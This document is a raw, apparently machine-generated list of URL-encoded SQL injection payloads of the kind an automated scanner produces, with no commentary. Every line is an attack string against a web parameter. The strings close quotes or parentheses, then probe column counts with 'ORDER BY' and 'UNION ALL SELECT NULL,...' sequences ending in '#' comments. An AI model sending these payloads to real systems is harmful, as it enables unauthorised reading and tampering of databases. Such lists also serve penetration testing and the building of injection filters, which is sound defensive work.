1%29%29%29%20ORDER%20BY%209867%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20ORDER%20BY%201%23 1%20ORDER%20BY%201517%23 1%20UNION%20ALL%20SELECT%20NULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%202998%3D2998%20ORDER%20BY%201%23 1%29%20WHERE%204891%3D4891%20ORDER%20BY%201049%23 1%29%20WHERE%206766%3D6766%20UNION%20ALL%20SELECT%20NULL%23 1%29%20WHERE%204010%3D4010%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%29%20WHERE%202127%3D2127%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%29%20WHERE%204888%3D4888%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%205938%3D5938%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%203463%3D3463%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%201139%3D1139%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%201356%3D1356%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%203643%3D3643%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%204169%3D4169%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%205246%3D5246%20ORDER%20BY%201%23 1%20WHERE%202630%3D2630%20ORDER%20BY%208992%23 1%20WHERE%208133%3D8133%20UNION%20ALL%20SELECT%20NULL%23 1%20WHERE%203002%3D3002%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%20WHERE%203076%3D3076%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%20WHERE%205302%3D5302%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%203303%3D3303%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%208908%3D8908%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%203876%3D3876%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%207744%3D7744%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%203700%3D3700%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%202863%3D2863%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20ORDER%20BY%201%23 1%27%29%20ORDER%20BY%205666%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20ORDER%20BY%201%23 1%27%20ORDER%20BY%203455%23 1%27%20UNION%20ALL%20SELECT%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20ORDER%20BY%201%23 1%22%20ORDER%20BY%208062%23 1%22%20UNION%20ALL%20SELECT%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20ORDER%20BY%201%23 1%27%29%20ORDER%20BY%203301%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20ORDER%20BY%201%23 1%27%29%29%20ORDER%20BY%202700%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20ORDER%20BY%201%23 1%27%29%29%29%20ORDER%20BY%209137%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20ORDER%20BY%201%23 1%27%20ORDER%20BY%209757%23 1%27%20UNION%20ALL%20SELECT%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20ORDER%20BY%201%23 1%27%29%20ORDER%20BY%208739%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20ORDER%20BY%201%23 1%27%29%29%20ORDER%20BY%209921%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20ORDER%20BY%201%23 1%27%29%29%29%20ORDER%20BY%204401%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20ORDER%20BY%201%23 1%27%20ORDER%20BY%201076%23 1%27%20UNION%20ALL%20SELECT%20NULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20ORDER%20BY%201%23 1%22%29%20ORDER%20BY%205502%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20ORDER%20BY%201%23 1%22%29%29%20ORDER%20BY%204573%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20ORDER%20BY%201%23 1%22%29%29%29%20ORDER%20BY%202004%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20ORDER%20BY%201%23 1%22%20ORDER%20BY%208357%23 1%22%20UNION%20ALL%20SELECT%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20ORDER%20BY%201%23 1%22%29%20ORDER%20BY%202051%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20ORDER%20BY%201%23 1%22%29%29%20ORDER%20BY%201127%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20ORDER%20BY%201%23 1%22%29%29%29%20ORDER%20BY%206035%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20ORDER%20BY%201%23 1%22%20ORDER%20BY%204163%23 1%22%20UNION%20ALL%20SELECT%20NULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20ORDER%20BY%201%23 1%25%27%29%20ORDER%20BY%204581%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20ORDER%20BY%201%23 1%25%27%29%29%20ORDER%20BY%202159%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 